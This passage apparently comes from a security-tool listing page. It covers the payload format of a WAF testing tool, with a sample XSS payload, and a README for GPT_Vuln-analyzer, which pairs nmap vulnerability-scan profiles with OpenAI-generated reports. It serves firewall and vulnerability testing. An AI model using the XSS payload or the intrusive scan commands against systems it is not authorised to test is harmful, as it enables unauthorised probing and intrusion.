    • BOUNDARY - specifies the contents of the request's boundary. Applicable only to payloads in the MFD directory.
• ENCODE - specifies the type of payload encoding (Base64, HTML-ENTITY, UTF-16) in addition to the encoding of the payload itself. Multiple values are separated with a space (e.g. Base64 UTF-16). Applicable only to the ARGS, BODY, COOKIE and HEADER zones. Not applicable to payloads in the API and MFD directories. Not compatible with the JSON option.
    • JSON - specifies that the request's body should be in JSON format
    • BLOCKED - specifies that the request should be blocked (FN testing) or not (FP)

Except for some cases described below, the zones are independent of each other and are tested separately (that is, if 2 zones are specified, the script will send 2 requests, checking one zone and then the other).

For the zones you can use the %RND% suffix, which allows you to generate an arbitrary string of 6 letters and digits (e.g.: param%RND%=my_payload or param=%RND% OR A%RND%B).

You can create your own payloads: to do this, create your own folder in the '/payload/' folder, or place the payload in an existing one (e.g.: '/payload/XSS'). The allowed data format is JSON.
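
To make the zone vocabulary concrete, here is a small Python sketch that writes a hypothetical XSS payload file. The exact top-level JSON structure is an assumption on my part; compare it against the payload files shipped in the repository's /payload/ folders before relying on it:

    import json

    # Hypothetical payload using the zones/options described above;
    # verify the exact schema against the bundled payload files.
    payload = {
        "payload": {
            "ARGS": "<script>alert('A%RND%B')</script>",  # %RND% -> random 6-char string
            "BLOCKED": True,                              # FN test: request should be blocked
        }
    }

    with open("payload/XSS/my-xss.json", "w", encoding="utf-8") as f:
        json.dump(payload, f, indent=4)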

    API directory

    API testing payloads located in this directory are automatically appended with a header 'Content-Type: application/json'.

    MFD directory

For MFD (multipart/form-data) payloads located in this directory, you must specify the BODY (required) and the BOUNDARY (optional). If BOUNDARY is not set, it will be generated automatically (in this case, only the payload itself must be specified for the BODY, without additional data such as '... Content-Disposition: form-data; ...').

If a BOUNDARY is specified, then the content of the BODY must be formatted in accordance with the RFC; this allows for multiple payloads in the BODY, separated by the BOUNDARY.

    Other zones are allowed in this directory (e.g.: URL, ARGS etc.). Regardless of the zone, header 'Content-Type: multipart/form-data; boundary=...' will be added to all requests.



    GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


This is a Proof of Concept application that demonstrates how AI can be used to generate accurate results for vulnerability analysis, while also allowing further utilization of the already super useful ChatGPT.

    Requirements

    • Python 3.10
    • All the packages mentioned in the requirements.txt file
• An OpenAI API key

    Usage

• First, change the "__API__KEY" part of the code to your OpenAI API key
  openai.api_key = "__API__KEY" # Enter your API key
• Second, install the packages
  pip3 install -r requirements.txt
  or
  pip install -r requirements.txt
• Run the code: python3 gpt_vuln.py <target> (on Windows, run python gpt_vuln.py <target>)

Supported on both Windows and Linux

    Understanding the code

    Profiles:

Parameter  Return data  Description            Nmap Command
p1         json         Effective Scan         -Pn -sV -T4 -O -F
p2         json         Simple Scan            -Pn -T4 -A -v
p3         json         Low Power Scan         -Pn -sS -sU -T4 -A -v
p4         json         Partial Intense Scan   -Pn -p- -T4 -A -v
p5         json         Complete Intense Scan  -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln

The profile is the type of scan that will be executed by the nmap subprocess. The IP or target is provided via argparse. First, the custom nmap scan is run with all the crucial arguments for the scan. Next, the relevant scan data is extracted from the huge pile of data that nmap produces; the "scan" object holds a list of sub-data under "tcp", each entry labeled according to the open ports. Once the data is extracted, it is sent to the OpenAI API's davinci model via a prompt. The prompt specifically asks for JSON output and describes how the data should be used.

The entire structure of the request that is sent to the OpenAI API is defined in the completion section of the program.

    import nmap
    import openai

    nm = nmap.PortScanner()
    model_engine = "text-davinci-003"  # the "davinci" model mentioned above (exact name assumed)

    def profile(ip):
        # Run the complete intense scan profile against the target
        nm.scan('{}'.format(ip), arguments='-Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln')
        json_data = nm.analyse_nmap_xml_scan()
        analize = json_data["scan"]
        # Prompt describing what the query is all about
        prompt = "do a vulnerability analysis of {} and return a vulnerability report in json".format(analize)
        # The structure of the request sent to the OpenAI API
        completion = openai.Completion.create(
            engine=model_engine,
            prompt=prompt,
            max_tokens=1024,
            n=1,
            stop=None,
        )
        response = completion.choices[0].text
        return response
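
For completeness, a minimal way to exercise this function (the target value is only an example; in the real tool the target comes from argparse):

    if __name__ == "__main__":
        print(profile("scanme.nmap.org"))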

    Advantages

• Can be used to develop more advanced systems built entirely on the API and scanner combination
• Can increase the effectiveness of the final system
• Highly productive when working with models such as GPT-3

